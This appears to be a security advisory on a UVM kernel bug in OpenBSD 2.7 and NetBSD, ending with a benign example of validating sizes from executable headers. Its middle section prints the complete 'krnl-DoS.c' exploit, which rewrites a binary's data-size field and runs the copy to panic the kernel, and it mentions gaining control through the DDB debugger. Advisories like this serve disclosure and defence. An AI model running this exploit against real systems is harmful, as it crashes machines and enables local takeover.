Vulnerability

kernel

Affected

OpenBSD 2.7, NetBSD

Description

An anonymous source found the following. UVM is a new virtual memory system that is currently used in OpenBSD. It is significantly better than the traditional MACH-based VM. The bug exists in the anonymous mapping code in UVM. This bug allows any local user (or remote user) to crash the entire OpenBSD system, rendering it completely useless. Once the system has crashed, a local user (with access to the terminal) may in fact hack the system. The system drops into DDB (man it). DDB allows for debugging of the actual kernel.

Basically, if (sz & (PAGE_SIZE-1)) is true, the kernel panic()s. Here is the exploit:

    // PUBLIC RELEASE
    //
    // krnl-DoS.c by RLoxley of Team Hackphreak (#hackphreak on unet) & SSG
    //
    // This exploit is proof of concept code. It exploits the UVM bug in
    // all OpenBSD kernels. It can also be used to gain god access via
    // ddb during the crash recovery phase of OpenBSD's security structure.
    //
    // Greets: #hackphreak, RootShellHackers, ZSH (#!/bin/zsh), EHAP,
    // Condemnation, caddis[TESO], Solar Designer, gov-boi,
    // #darknet, ISS, #conf, Al Hugher, Aleph1, shinex (for porting)
    // SSG, www.subterrain.net
    //
    // PS: The exploit is broke very slightly, so this takes some knowledge
    //
    // PUBLIC RELEASE

    #include <stdio.h>
    #include <errno.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <a.out.h>
    #include <fcntl.h>
    #include <sys/types.h>

    #define CRASH_FILE "./f0rKb0mB"

    extern int errno;

    int main(int argc, char *argv[])
    {
        struct exec *ehdr;
        struct stat statbuf;
        int fd;
        unsigned char *data;

        fd = open(argv[0], O_RDONLY);
        if (fd < 0) {
            perror("main() : open(argv[0]) ");
            exit(-1);
        }

        if (fstat(fd, &statbuf) < 0) {
            perror("main() : fstat() ");
            exit(-1);
        }

        data = (unsigned char *) malloc(statbuf.st_size);
        if (data == NULL) {
            perror("main() : malloc() ");
            exit(-1);
        }

        if (read(fd, data, statbuf.st_size) <= 0) {
            puts("main() : read() Failure");
            exit(-1);
        }

        ehdr = (struct exec *) data;
        close(fd);

        unlink(CRASH_FILE);
        fd = open(CRASH_FILE, O_RDWR | O_CREAT, S_IXUSR);
        if (fd < 0) {
            perror("main() : open(CRASH_FILE) ");
            exit(-1);
        }

        ehdr->a_data += 3;

        if (write(fd, data, statbuf.st_size) < 0) {
            perror("main() : write() ");
            exit(-1);
        }

        close(fd);

        if (execlp(CRASH_FILE, NULL) < 0) {
            perror("main() : execlp() ");
            exit(-1);
        }

        return (0);
    }

Solution

There is a patch.
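
The Description reduces the bug to one condition, (sz & (PAGE_SIZE-1)), being reached with a size taken from an executable header. The following user-space model is an added example, not OpenBSD's code and not the patch mentioned above; it shows the defensive pattern of validating header-supplied sizes and returning an error rather than panicking. The struct, the function names, the 4096-byte page size and the reject/round policy are all assumptions made for illustration.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#define PAGE_SIZE 4096u              /* assumed page size for this model */
#define PAGE_MASK (PAGE_SIZE - 1u)

/* Hypothetical stand-in for the segment sizes in an executable header.
 * Every field is read from the file, so every field is untrusted. */
struct seg_sizes { uint32_t text, data, bss; };

/* Model of a mapping routine that requires a page-multiple size.
 * It reports the violation to the caller instead of calling panic(). */
int map_anon_checked(uint32_t sz)
{
    if (sz == 0 || (sz & PAGE_MASK) != 0)
        return EINVAL;               /* the condition the advisory describes */
    return 0;                        /* a real kernel would map here */
}

/* Round up to a page boundary; fail on overflow instead of wrapping. */
int round_page_checked(uint32_t sz, uint32_t *out)
{
    if (sz > UINT32_MAX - PAGE_MASK)
        return EOVERFLOW;
    *out = (sz + PAGE_MASK) & ~PAGE_MASK;
    return 0;
}

/* Loader-side check, run before any mapping call. Rejecting unaligned
 * text/data and rounding bss is a policy assumed for this example. */
int validate_segments(const struct seg_sizes *h)
{
    uint32_t bss;
    if ((h->text & PAGE_MASK) != 0 || (h->data & PAGE_MASK) != 0)
        return ENOEXEC;
    if (round_page_checked(h->bss, &bss) != 0)
        return ENOEXEC;
    if (bss != 0 && map_anon_checked(bss) != 0)
        return ENOEXEC;
    return 0;
}

int main(void)
{
    /* Constructed sample headers: one aligned, one with data size + 3. */
    struct seg_sizes ok = { 8192, 4096, 100 }, bad = { 8192, 4096 + 3, 100 };
    printf("%d %d\n", validate_segments(&ok), validate_segments(&bad));
    return 0;
}
```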